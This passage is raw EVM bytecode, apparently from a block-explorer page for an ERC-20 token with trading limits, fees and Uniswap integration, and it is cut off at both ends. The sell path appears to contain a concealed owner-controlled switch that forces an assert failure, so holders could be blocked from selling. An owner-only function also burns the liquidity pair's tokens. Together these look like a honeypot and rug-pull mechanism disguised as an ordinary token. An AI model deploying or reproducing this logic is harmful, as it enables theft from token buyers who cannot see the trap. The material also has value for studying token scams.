024836145c6565b915061549982615432565b604082019050919050565b600060208201905081810360008301526154bd81615481565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006155206022836145c6565b915061552b826154c4565b604082019050919050565b6000602082019050818103600083015261554f81615513565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006155b26025836145c6565b91506155bd82615556565b604082019050919050565b600060208201905081810360008301526155e1816155a5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006156446023836145c6565b915061564f826155e8565b604082019050919050565b6000602082019050818103600083015261567381615637565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b60006156b06016836145c6565b91506156bb8261567a565b602082019050919050565b600060208201905081810360008301526156df816156a3565b9050919050565b7f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60008201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b60208201527f20616c6c6f7765642e0000000000000000000000000000000000000000000000604082015250565b60006157686049836145c6565b9150615773826156e6565b606082019050919050565b600060208201905081810360008301526157978161575b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b60006157fa6035836145c6565b91506158058261579e565b604082019050919050565b60006020820190508181036000830152615829816157ed565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b60006158666013836145c6565b915061587182615830565b602082019050919050565b6000602082019050818103600083015261589581615859565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b60006158f86036836145c6565b91506159038261589c565b604082019050919050565b60006020820190508181036000830152615927816158eb565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052600160045260246000fd5b6000615968826146a7565b9150615973836146a7565b92508282101561598657615985614b27565b5b828203905092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006159ed6026836145c6565b91506159f882615991565b604082019050919050565b60006020820190508181036000830152615a1c816159e0565b9050919050565b600081905092915050565b50565b6000615a3e600083615a23565b9150615a4982615a2e565b600082019050919050565b6000615a5f82615a31565b9150819050919050565b6000606082019050615a7e60008301866147fa565b615a8b60208301856147fa565b615a9860408301846147fa565b949350505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050615b0d8161467b565b92915050565b600060208284031215615b2957615b28614676565b5b6000615b3784828501615afe565b91505092915050565b6000819050919050565b6000615b65615b60615b5b84615b40565b614780565b6146a7565b9050919050565b615b7581615b4a565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b615bb08161457f565b82525050565b6000615bc28383615ba7565b60208301905092915050565b6000602082019050919050565b6000615be682615b7b565b615bf08185615b86565b9350615bfb83615b97565b8060005b83811015615c2c578151615c138882615bb6565b9750615c1e83615bce565b925050600181019050615bff565b5085935050505092915050565b600060a082019050615c4e60008301886147fa565b615c5b6020830187615b6c565b8181036040830152615c6d8186615bdb565b9050615c7c6060830185614591565b615c8960808301846147fa565b9695505050505050565b600060c082019050615ca86000830189614591565b615cb560208301886147fa565b615cc26040830187615b6c565b615ccf6060830186615b6c565b615cdc6080830185614591565b615ce960a08301846147fa565b979650505050505050565b600080600060608486031215615d0d57615d0c614676565b5b6000615d1b868287016153f0565b9350506020615d2c868287016153f0565b9250506040615d3d868287016153f0565b915050925092509256fea2646970667358221220dff2cd898c17c1c7b6b118a1035a586875424589fb62f7b58f6dff12380050fb64736f6c634300080a0033

Deployed Bytecode

0x6080604052600436106103c75760003560e01c80638da5cb5b116101f2578063c04a54141161010d578063e2f45605116100a0578063f2fde38b1161006f578063f2fde38b14610e6f578063f637434214610e98578063f8b45b0514610ec3578063fe72b27a14610eee576103ce565b8063e2f4560514610dc5578063e884f26014610df0578063f023f57314610e1b578063f11a24d314610e44576103ce565b8063c8c8ebe4116100dc578063c8c8ebe414610cf5578063d257b34f14610d20578063d85ba06314610d5d578063dd62ed3e14610d88576103ce565b8063c04a541414610c4d578063c17b5b8c14610c78578063c18bc19514610ca1578063c876d0b914610cca576103ce565b8063a0d82dc511610185578063aacebbe311610154578063aacebbe314610b93578063b62496f514610bbc578063bbc0c74214610bf9578063c024666814610c24576103ce565b8063a0d82dc514610ac3578063a457c2d714610aee578063a4c82a0014610b2b578063a9059cbb14610b56576103ce565b80639a7a23d6116101c15780639a7a23d614610a195780639c3b4fdc14610a425780639ec22c0e14610a6d5780639fccce3214610a98576103ce565b80638da5cb5b1461096f578063921369131461099a578063924de9b7146109c557806395d89b41146109ee576103ce565b806339509351116102e2578063715018a61161027557806375f0a8741161024457806375f0a874146108d95780637bce5a04146109045780638095d5641461092f5780638a8c523c14610958576103ce565b8063715018a614610845578063730c18881461085c578063751039fc146108855780637571336a146108b0576103ce565b80635d60c7be116102b15780635d60c7be146107875780636a486a8e146107b25780636ddd1713146107dd57806370a0823114610808576103ce565b806339509351146106b757806349bd5a5e146106f45780634a62bb651461071f5780634fbee1931461074a576103ce565b80631a8145bb1161035a57806327c8f8351161032957806327c8f8351461060b5780632c3e486c146106365780632e82f1a014610661578063313ce5671461068c576103ce565b80631a8145bb1461054f5780631f3fed8f1461057a578063203e727e146105a557806323b872dd146105ce576103ce565b80631694505e116103965780631694505e146104a357806318160ddd146104ce578063184c16c5146104f9578063199ffc7214610524576103ce565b806303fc2013146103d357806306fdde03146103fe578063095ea7b31461042957806310d5de5314610466576103ce565b366103ce57005b600080fd5b3480156103df57600080fd5b506103e8610f2b565b6040516103f591906145a0565b60405180910390f35b34801561040a57600080fd5b50610413610f51565b6040516104209190614654565b60405180910390f35b34801561043557600080fd5b50610450600480360381019061044b91906146dd565b610fe3565b60405161045d9190614738565b60405180910390f35b34801561047257600080fd5b5061048d60048036038101906104889190614753565b611001565b60405161049a9190614738565b60405180910390f35b3480156104af57600080fd5b506104b8611021565b6040516104c591906147df565b60405180910390f35b3480156104da57600080fd5b506104e3611045565b6040516104f09190614809565b60405180910390f35b34801561050557600080fd5b5061050e61104f565b60405161051b9190614809565b60405180910390f35b34801561053057600080fd5b50610539611055565b6040516105469190614809565b60405180910390f35b34801561055b57600080fd5b5061056461105b565b6040516105719190614809565b60405180910390f35b34801561058657600080fd5b5061058f611061565b60405161059c9190614809565b60405180910390f35b3480156105b157600080fd5b506105cc60048036038101906105c79190614824565b611067565b005b3480156105da57600080fd5b506105f560048036038101906105f09190614851565b611176565b6040516106029190614738565b60405180910390f35b34801561061757600080fd5b5061062061126e565b60405161062d91906145a0565b60405180910390f35b34801561064257600080fd5b5061064b611274565b6040516106589190614809565b60405180910390f35b34801561066d57600080fd5b5061067661127a565b6040516106839190614738565b60405180910390f35b34801561069857600080fd5b506106a161128d565b6040516106ae91906148c0565b60405180910390f35b3480156106c357600080fd5b506106de60048036038101906106d991906146dd565b611296565b6040516106eb9190614738565b60405180910390f35b34801561070057600080fd5b50610709611342565b60405161071691906145a0565b60405180910390f35b34801561072b57600080fd5b50610734611366565b6040516107419190614738565b60405180910390f35b34801561075657600080fd5b50610771600480360381019061076c9190614753565b611379565b60405161077e9190614738565b60405180910390f35b34801561079357600080fd5b5061079c6113cf565b6040516107a991906145a0565b60405180910390f35b3480156107be57600080fd5b506107c76113f5565b6040516107d49190614809565b60405180910390f35b3480156107e957600080fd5b506107f26113fb565b6040516107ff9190614738565b60405180910390f35b34801561081457600080fd5b5061082f600480360381019061082a9190614753565b61140e565b60405161083c9190614809565b60405180910390f35b34801561085157600080fd5b5061085a611456565b005b34801561086857600080fd5b50610883600480360381019061087e9190614907565b6114de565b005b34801561089157600080fd5b5061089a61161e565b6040516108a79190614738565b60405180910390f35b3480156108bc57600080fd5b506108d760048036038101906108d2919061495a565b6116be565b005b3480156108e557600080fd5b506108ee611795565b6040516108fb91906145a0565b60405180910390f35b34801561091057600080fd5b506109196117bb565b6040516109269190614809565b60405180910390f35b34801561093b57600080fd5b506109566004803603810190610951919061499a565b6117c1565b005b34801561096457600080fd5b5061096d6118c0565b005b34801561097b57600080fd5b5061098461197b565b60405161099191906145a0565b60405180910390f35b3480156109a657600080fd5b506109af6119a5565b6040516109bc9190614809565b60405180910390f35b3480156109d157600080fd5b506109ec60048036038101906109e791906149ed565b6119ab565b005b3480156109fa57600080fd5b50610a03611a44565b604051610a109190614654565b60405180910390f35b348015610a2557600080fd5b50610a406004803603810190610a3b919061495a565b611ad6565b005b348015610a4e57600080fd5b50610a57611bef565b604051610a649190614809565b60405180910390f35b348015610a7957600080fd5b50610a82611bf5565b604051610a8f9190614809565b60405180910390f35b348015610aa457600080fd5b50610aad611bfb565b604051610aba9190614809565b60405180910390f35b348015610acf57600080fd5b50610ad8611c01565b604051610ae59190614809565b60405180910390f35b348015610afa57600080fd5b50610b156004803603810190610b1091906146dd565b611c07565b604051610b229190614738565b60405180910390f35b348015610b3757600080fd5b50610b40611cf2565b604051610b4d9190614809565b60405180910390f35b348015610b6257600080fd5b50610b7d6004803603810190610b7891906146dd565b611cf8565b604051610b8a9190614738565b60405180910390f35b348015610b9f57600080fd5b50610bba6004803603810190610bb59190614753565b611d16565b005b348015610bc857600080fd5b50610be36004803603810190610bde9190614753565b611e52565b604051610bf09190614738565b60405180910390f35b348015610c0557600080fd5b50610c0e611e72565b604051610c1b9190614738565b60405180910390f35b348015610c3057600080fd5b50610c4b6004803603810190610c46919061495a565b611e85565b005b348015610c5957600080fd5b50610c62611faa565b604051610c6f91906145a0565b60405180910390f35b348015610c8457600080fd5b50610c9f6004803603810190610c9a919061499a565b611fd0565b005b348015610cad57600080fd5b50610cc86004803603810190610cc39190614824565b6120cf565b005b348015610cd657600080fd5b50610cdf6121de565b604051610cec9190614738565b60405180910390f35b348015610d0157600080fd5b50610d0a6121f1565b604051610d179190614809565b60405180910390f35b348015610d2c57600080fd5b50610d476004803603810190610d429190614824565b6121f7565b604051610d549190614738565b60405180910390f35b348015610d6957600080fd5b50610d7261234c565b604051610d7f9190614809565b60405180910390f35b348015610d9457600080fd5b50610daf6004803603810190610daa9190614a1a565b612352565b604051610dbc9190614809565b60405180910390f35b348015610dd157600080fd5b50610dda6123d9565b604051610de79190614809565b60405180910390f35b348015610dfc57600080fd5b50610e056123df565b604051610e129190614738565b60405180910390f35b348015610e2757600080fd5b50610e426004803603810190610e3d9190614753565b61247f565b005b348015610e5057600080fd5b50610e596125bb565b604051610e669190614809565b60405180910390f35b348015610e7b57600080fd5b50610e966004803603810190610e919190614753565b6125c1565b005b348015610ea457600080fd5b50610ead6126b9565b604051610eba9190614809565b60405180910390f35b348015610ecf57600080fd5b50610ed86126bf565b604051610ee59190614809565b60405180910390f35b348015610efa57600080fd5b50610f156004803603810190610f109190614824565b6126c5565b604051610f229190614738565b60405180910390f35b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f6090614a89565b80601f0160208091040260200160405190810160405280929190818152602001828054610f8c90614a89565b8015610fd95780601f10610fae57610100808354040283529160200191610fd9565b820191906000526020600020905b815481529060010190602001808311610fbc57829003601f168201915b5050505050905090565b6000610ff7610ff061299d565b84846129a5565b6001905092915050565b60226020528060005260406000206000915054906101000a900460ff1681565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b60115481565b600d5481565b601f5481565b601e5481565b61106f61299d565b73ffffffffffffffffffffffffffffffffffffffff1661108d61197b565b73ffffffffffffffffffffffffffffffffffffffff16146110e3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110da90614b07565b60405180910390fd5b670de0b6b3a76400006103e860016110f9611045565b6111039190614b56565b61110d9190614bdf565b6111179190614bdf565b811015611159576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161115090614c82565b60405180910390fd5b670de0b6b3a76400008161116d9190614b56565b600a8190555050565b6000611183848484612b70565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006111ce61299d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561124e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124590614d14565b60405180910390fd5b6112628561125a61299d565b8584036129a5565b60019150509392505050565b61dead81565b600f5481565b600e60009054906101000a900460ff1681565b60006012905090565b60006113386112a361299d565b8484600160006112b161299d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113339190614d34565b6129a5565b6001905092915050565b7f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608581565b601360009054906101000a900460ff1681565b6000602160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601a5481565b601360029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61145e61299d565b73ffffffffffffffffffffffffffffffffffffffff1661147c61197b565b73ffffffffffffffffffffffffffffffffffffffff16146114d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114c990614b07565b60405180910390fd5b6114dc6000613965565b565b6114e661299d565b73ffffffffffffffffffffffffffffffffffffffff1661150461197b565b73ffffffffffffffffffffffffffffffffffffffff161461155a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161155190614b07565b60405180910390fd5b61025883101561159f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159690614dfc565b60405180910390fd5b6103e882111580156115b2575060008210155b6115f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e890614e8e565b60405180910390fd5b82600f8190555081600d8190555080600e60006101000a81548160ff021916908315150217905550505050565b600061162861299d565b73ffffffffffffffffffffffffffffffffffffffff1661164661197b565b73ffffffffffffffffffffffffffffffffffffffff161461169c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161169390614b07565b60405180910390fd5b6000601360006101000a81548160ff0219169083151502179055506001905090565b6116c661299d565b73ffffffffffffffffffffffffffffffffffffffff166116e461197b565b73ffffffffffffffffffffffffffffffffffffffff161461173a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161173190614b07565b60405180910390fd5b80602260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60175481565b6117c961299d565b73ffffffffffffffffffffffffffffffffffffffff166117e761197b565b73ffffffffffffffffffffffffffffffffffffffff161461183d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161183490614b07565b60405180910390fd5b8260178190555081601881905550806019819055506019546018546017546118659190614d34565b61186f9190614d34565b601681905550601460165411156118bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b290614efa565b60405180910390fd5b505050565b6118c861299d565b73ffffffffffffffffffffffffffffffffffffffff166118e661197b565b73ffffffffffffffffffffffffffffffffffffffff161461193c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193390614b07565b60405180910390fd5b6001601360016101000a81548160ff0219169083151502179055506001601360026101000a81548160ff02191690831515021790555042601081905550565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b601b5481565b6119b361299d565b73ffffffffffffffffffffffffffffffffffffffff166119d161197b565b73ffffffffffffffffffffffffffffffffffffffff1614611a27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1e90614b07565b60405180910390fd5b80601360026101000a81548160ff02191690831515021790555050565b606060048054611a5390614a89565b80601f0160208091040260200160405190810160405280929190818152602001828054611a7f90614a89565b8015611acc5780601f10611aa157610100808354040283529160200191611acc565b820191906000526020600020905b815481529060010190602001808311611aaf57829003601f168201915b5050505050905090565b611ade61299d565b73ffffffffffffffffffffffffffffffffffffffff16611afc61197b565b73ffffffffffffffffffffffffffffffffffffffff1614611b52576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b4990614b07565b60405180910390fd5b7f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608573ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611be1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd890614f8c565b60405180910390fd5b611beb8282613a2b565b5050565b60195481565b60125481565b60205481565b601d5481565b60008060016000611c1661299d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015611cd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cca9061501e565b60405180910390fd5b611ce7611cde61299d565b858584036129a5565b600191505092915050565b60105481565b6000611d0c611d0561299d565b8484612b70565b6001905092915050565b611d1e61299d565b73ffffffffffffffffffffffffffffffffffffffff16611d3c61197b565b73ffffffffffffffffffffffffffffffffffffffff1614611d92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8990614b07565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60236020528060005260406000206000915054906101000a900460ff1681565b601360019054906101000a900460ff1681565b611e8d61299d565b73ffffffffffffffffffffffffffffffffffffffff16611eab61197b565b73ffffffffffffffffffffffffffffffffffffffff1614611f01576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ef890614b07565b60405180910390fd5b80602160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f9e9190614738565b60405180910390a25050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b611fd861299d565b73ffffffffffffffffffffffffffffffffffffffff16611ff661197b565b73ffffffffffffffffffffffffffffffffffffffff161461204c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161204390614b07565b60405180910390fd5b82601b8190555081601c8190555080601d81905550601d54601c54601b546120749190614d34565b61207e9190614d34565b601a819055506028601a5411156120ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120c19061508a565b60405180910390fd5b505050565b6120d761299d565b73ffffffffffffffffffffffffffffffffffffffff166120f561197b565b73ffffffffffffffffffffffffffffffffffffffff161461214b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161214290614b07565b60405180910390fd5b670de0b6b3a76400006103e86005612161611045565b61216b9190614b56565b6121759190614bdf565b61217f9190614bdf565b8110156121c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121b89061511c565b60405180910390fd5b670de0b6b3a7640000816121d59190614b56565b600c8190555050565b601560009054906101000a900460ff1681565b600a5481565b600061220161299d565b73ffffffffffffffffffffffffffffffffffffffff1661221f61197b565b73ffffffffffffffffffffffffffffffffffffffff1614612275576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226c90614b07565b60405180910390fd5b620186a06001612283611045565b61228d9190614b56565b6122979190614bdf565b8210156122d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122d0906151ae565b60405180910390fd5b6103e860056122e6611045565b6122f09190614b56565b6122fa9190614bdf565b82111561233c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161233390615240565b60405180910390fd5b81600b8190555060019050919050565b60165481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e961299d565b73ffffffffffffffffffffffffffffffffffffffff1661240761197b565b73ffffffffffffffffffffffffffffffffffffffff161461245d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161245490614b07565b60405180910390fd5b6000601560006101000a81548160ff0219169083151502179055506001905090565b61248761299d565b73ffffffffffffffffffffffffffffffffffffffff166124a561197b565b73ffffffffffffffffffffffffffffffffffffffff16146124fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124f290614b07565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167ffaf1b77ed79f6e898c44dd8ab36b330c7b2fd39bcaab05ed6362480df870396560405160405180910390a380600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60185481565b6125c961299d565b73ffffffffffffffffffffffffffffffffffffffff166125e761197b565b73ffffffffffffffffffffffffffffffffffffffff161461263d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161263490614b07565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156126ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126a4906152d2565b60405180910390fd5b6126b681613965565b50565b601c5481565b600c5481565b60006126cf61299d565b73ffffffffffffffffffffffffffffffffffffffff166126ed61197b565b73ffffffffffffffffffffffffffffffffffffffff1614612743576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273a90614b07565b60405180910390fd5b6011546012546127539190614d34565b4211612794576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161278b9061533e565b60405180910390fd5b6103e88211156127d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127d0906153d0565b60405180910390fd5b4260128190555060003073ffffffffffffffffffffffffffffffffffffffff166370a082317f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b60856040518263ffffffff1660e01b815260040161283b91906145a0565b602060405180830381865afa158015612858573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061287c9190615405565b905060006128a76127106128998685613acc90919063ffffffff16565b613ae290919063ffffffff16565b905060008111156128e0576128df7f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608561dead83613af8565b5b60007f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608590508073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561294d57600080fd5b505af1158015612961573d6000803e3d6000fd5b505050507f8462566617872a3fbab94534675218431ff9e204063ee3f4f43d965626a39abb60405160405180910390a160019350505050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415612a15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a0c906154a4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612a85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a7c90615536565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051612b639190614809565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415612be0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612bd7906155c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612c50576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c479061565a565b60405180910390fd5b6000811415612c6a57612c6583836000613af8565b613960565b601360009054906101000a900460ff161561338a57612c8761197b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612cf55750612cc561197b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d2e5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d68575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d815750600560149054906101000a900460ff16155b1561338957601360019054906101000a900460ff16612e7b57602160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612e3b5750602160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612e7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612e71906156c6565b60405180910390fd5b5b601560009054906101000a900460ff161561304357612e9861197b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015612f1f57507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612f7757507f000000000000000000000000b5cb4a06ac03ceaacceec76fc932cf008b2b608573ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156130425743601460003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410612ffd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ff49061577e565b60405180910390fd5b43601460003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b602360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156130e65750602260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561318d57600a54811115613130576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161312790615810565b60405180910390fd5b600c5461313c8361140e565b826131479190614d34565b1115613188576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161317f9061587c565b60405180910390fd5b613388565b602360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156132305750602260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156132dc57600a5481111561327a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132719061590e565b60405180910390fd5b6021600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156132d7576132d661592e565b5b613387565b602260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661338657600c546133398361140e565b826133449190614d34565b1115613385576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161337c9061587c565b60405180910390fd5b5b5b5b5b5b60006133953061140e565b90506000600b5482101590508080156133ba5750601360029054906101000a900460ff165b80156133d35750600560149054906101000a900460ff16155b80156134295750602360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561347f5750602160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156134d55750602160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613519576001600560146101000a81548160ff0219169083151502179055506134fd613d79565b6000600560146101000a81548160ff0219169083151502179055505b600560149054906101000a900460ff1615801561357f5750602360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80156135975750600e60009054906101000a900460ff165b80156135b25750600f546010546135ae9190614d34565b4210155b80156136085750602160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561361757613615614060565b505b6000600560149054906101000a900460ff16159050602160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806136cd5750602160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156136d757600090505b6000811561395057602360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561373a57506000601a54115b15613807576137676064613759601a5488613acc90919063ffffffff16565b613ae290919063ffffffff16565b9050601a54601c548261377a9190614b56565b6137849190614bdf565b601f60008282546137959190614d34565b92505081905550601a54601d54826137ad9190614b56565b6137b79190614bdf56